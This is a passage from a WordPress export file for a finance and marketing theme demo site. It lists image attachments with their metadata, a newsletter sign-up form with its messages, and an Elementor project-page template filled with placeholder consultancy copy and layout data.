						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-home5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/bg1-home5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:600;s:4:"file";s:21:"2020/11/bg1-home5.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg1-home5-300x94.jpg";s:5:"width";i:300;s:6:"height";i:94;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-home5-1024x320.jpg";s:5:"width";i:1024;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-home5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-home5-768x240.jpg";s:5:"width";i:768;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-home5-1536x480.jpg";s:5:"width";i:1536;s:6:"height";i:480;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home5-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg1-home5-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg1-home5-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-home5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/image2-home5/</link>
		<pubDate>Tue, 17 Nov 2020 08:43:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-home5.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2281</wp:post_id>
		<wp:post_date><![CDATA[2020-11-17 08:43:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-17 08:43:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-home5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-home5.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image2-home5.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:522;s:6:"height";i:660;s:4:"file";s:24:"2020/11/image2-home5.png";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"image2-home5-237x300.png";s:5:"width";i:237;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image2-home5-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home5-522x400.png";s:5:"width";i:522;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home5-522x600.png";s:5:"width";i:522;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"image2-home5-522x600.png";s:5:"width";i:522;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>overlay-home5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/overlay-home5/</link>
		<pubDate>Tue, 17 Nov 2020 09:14:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/overlay-home5.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2309</wp:post_id>
		<wp:post_date><![CDATA[2020-11-17 09:14:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-17 09:14:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[overlay-home5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/overlay-home5.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/overlay-home5.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:914;s:6:"height";i:750;s:4:"file";s:25:"2020/11/overlay-home5.png";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:25:"overlay-home5-300x246.png";s:5:"width";i:300;s:6:"height";i:246;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"overlay-home5-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:12:"medium_large";a:4:{s:4:"file";s:25:"overlay-home5-768x630.png";s:5:"width";i:768;s:6:"height";i:630;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"overlay-home5-600x400.png";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"overlay-home5-600x600.png";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"overlay-home5-914x600.png";s:5:"width";i:914;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>signature-home5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/signature-home5/</link>
		<pubDate>Tue, 17 Nov 2020 09:25:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/signature-home5.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2316</wp:post_id>
		<wp:post_date><![CDATA[2020-11-17 09:25:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-17 09:25:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[signature-home5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/signature-home5.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/signature-home5.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:203;s:6:"height";i:52;s:4:"file";s:27:"2020/11/signature-home5.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"signature-home5-150x52.png";s:5:"width";i:150;s:6:"height";i:52;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/mc4wp-form/footer-form/</link>
		<pubDate>Mon, 02 Nov 2020 04:06:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/mc4wp-form/footer-form/</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="subscribe-inner-form">
    
	<button type="submit" class="subscribe-btn-icon"><i class="ot-flaticon-trajectory"></i></button>
</div>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>325</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:06:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:06:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[mc4wp-form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_mc4wp_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:15:"required_fields";s:5:"EMAIL";s:12:"double_optin";s:1:"1";s:15:"update_existing";s:1:"0";s:17:"replace_interests";s:1:"1";s:15:"subscriber_tags";s:0:"";s:18:"hide_after_success";s:1:"0";s:8:"redirect";s:0:"";s:3:"css";s:1:"0";s:5:"lists";a:0:{}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Thank you, your sign-up request was successful! Please check your email inbox to confirm.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_invalid_email]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please provide a valid email address.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_required_field_missing]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please fill in the required fields.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_already_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Given email address is already subscribed, thank you!]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_error]]></wp:meta_key>
		<wp:meta_value><![CDATA[Oops. Something went wrong. Please try again later.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_unsubscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[You were successfully unsubscribed.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_not_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Given email address is not subscribed.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_no_lists_selected]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please select at least one list.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_updated]]></wp:meta_key>
		<wp:meta_value><![CDATA[Thank you, your records have been updated!]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-28]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-10-21]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>MB Project Single</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?elementor_library=mb-project-single</link>
		<pubDate>Tue, 29 Sep 2020 08:52:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?elementor_library=mb-project-single</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							

	
		
			
		
	
	
	































						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							

	
		
			
		
	
	
	































						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-1-project.png" alt="" loading="lazy" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1050</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 08:52:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 08:52:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[mb-project-single]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="elementor_library_type" nicename="page"><![CDATA[page]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4f485cbd","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"16cddd65","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"3a4e789","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1ec5aac2","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"2b13e690","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"339d13f0","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"5889fd7c","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"10dcad63","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"53d5271c","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5dcaf7e2","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"4b3ecf7a","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"12cac18e","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6e41b761","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1ccebcb3","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5c6af9ae","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"2ea1549b","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"2bb4ff92","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"40167225","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"7125fb7b","elType":"section","settings":[],"elements":[{"id":"2292e976","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"74a4f2ef","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b6408db","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7a6fb144","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"4359b052","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"5695beea","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d323896","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6c607602","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"524b70b7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7a5ae6ff","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2bf4429e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"79862618","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"255cbb6f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d7135a4","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"38949894","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7af2ac6e","elType":"widget","settings":{"bar_style":"circle","title":"corporate 